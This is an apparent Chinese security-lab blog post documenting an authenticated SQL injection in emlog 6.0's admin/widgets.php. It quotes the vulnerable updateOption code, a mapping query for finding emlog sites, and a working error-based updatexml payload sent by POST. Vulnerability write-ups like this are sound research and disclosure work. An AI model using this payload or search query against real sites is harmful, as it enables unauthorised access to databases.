emlog widgets.php 后台SQL注入漏洞-秋刀鱼实验室

漏洞描述

emlog widgets.php文件在登录后通过构造特殊语句导致SQL注入，获取数据库敏感信息。

漏洞影响

emlog 6.0

网络测绘

app=”EMLOG”

漏洞复现

产品主页

https://github.com/emlog/emlog

存在漏洞的文件为 admin/widgets.php

if ($action == 'compages') {
    $wgNum = isset($_POST['wgnum']) ? intval($_POST['wgnum']) : 1;//侧边栏编号 1、2、3 ……
    $widgets = isset($_POST['widgets']) ? serialize($_POST['widgets']) : '';
    Option::updateOption("widgets{$wgNum}", $widgets);
    $CACHE->updateCache('options');
    emDirect("./widgets.php?activated=true&wg=$wgNum");
}

传参为 wgnum 和 widgets ，跟踪方法 updateOption

static function updateOption($name, $value, $isSyntax = false){
        $DB = Database::getInstance();
        $value = $isSyntax ? $value : "'$value'";
        $DB->query('UPDATE '.DB_PREFIX."options SET option_value=$value where option_name='$name'");
    }

可以发现对传入的参数木有进行过滤，构造Payload

POST /admin/widgets.php?action=compages

widgets=1' and updatexml(0x3a,concat(1,(select user())),1)--

调试后可以发现，数据库报错语句会回显至页面中，报错注入即可获取敏感信息

本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自秋刀鱼实验室

使用声明 1、秋刀鱼实验室
2、使用本实验室相关内容时请严格遵守《中华人民共和国网络安全法》
3、本网站的文章部分内容可能来源于网络，仅供学习参考，如有侵权，请联系support@saury.net进行删除处理。
4、本网站的文章内容仅供学习使用，切勿进行非授权测试，文章阅读者行为与本站无关。
5、本站一切资源不代表本站立场，并不代表本站赞同其观点和对其真实性负责。
6、本站一律禁止以任何方式发布或转载任何违法的相关信息。
7、如发现文件链接失效，请联系我们第一时间更新。

THE END

CMS漏洞

emlog widgets.php 后台SQL注入漏洞

漏洞描述

漏洞影响

网络测绘

漏洞复现

请登录后发表评论